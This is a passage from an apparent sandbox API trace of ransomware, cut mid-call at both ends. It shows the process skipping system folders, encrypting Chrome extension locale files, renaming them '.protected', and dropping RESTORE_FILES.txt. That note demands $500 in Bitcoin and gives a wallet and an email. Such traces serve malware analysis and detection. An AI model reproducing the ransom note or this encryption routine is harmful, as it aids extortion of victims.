lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.572] CloseHandle (hObject=0x164) returned 1 [0083.572] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0083.572] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr") returned 150 [0083.572] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0083.572] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0083.572] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*") returned 152 [0083.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.572] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.572] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.572] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.572] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.572] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.572] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\.") returned 152 [0083.573] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.573] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.573] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.573] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.573] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.573] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.573] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.573] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\..") returned 153 [0083.573] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.573] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.573] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.573] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0083.574] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.574] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.574] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.574] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.574] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0083.574] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.574] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0083.574] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.574] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0083.574] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.574] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.576] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.576] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.576] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.579] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.579] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.580] CloseHandle (hObject=0x168) returned 1 [0083.580] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.protected") returned 174 [0083.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.protected")) returned 1 [0083.581] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.581] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.581] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\RESTORE_FILES.txt") returned 168 [0083.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.581] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.581] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.582] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.582] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.582] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.582] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.583] CloseHandle (hObject=0x164) returned 1 [0083.583] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="Windows") returned -1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="Program Files") returned -1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="Program Files (x86)") returned -1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="$Recycle.bin") returned 1 [0083.583] lstrcmpiW (lpString1="gu", lpString2="System Volume Information") returned -1 [0083.583] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu") returned 150 [0083.583] lstrcmpW (lpString1="gu", lpString2=".") returned 1 [0083.583] lstrcmpW (lpString1="gu", lpString2="..") returned 1 [0083.583] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*") returned 152 [0083.583] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.583] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.585] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.585] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.585] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.585] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.585] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\.") returned 152 [0083.585] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.585] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.585] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.585] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.585] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.585] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.585] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.586] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\..") returned 153 [0083.586] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.586] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.586] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.586] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.586] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") returned 164 [0083.586] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.586] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.586] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.586] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") returned 164 [0083.597] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") returned 164 [0083.597] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json") returned 164 [0083.597] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.597] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.599] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.599] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.599] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.599] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.600] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.600] CloseHandle (hObject=0x168) returned 1 [0083.600] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.protected") returned 174 [0083.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.protected")) returned 1 [0083.600] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.601] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.601] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\RESTORE_FILES.txt") returned 168 [0083.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.601] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.601] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.602] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.602] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.602] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.602] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | 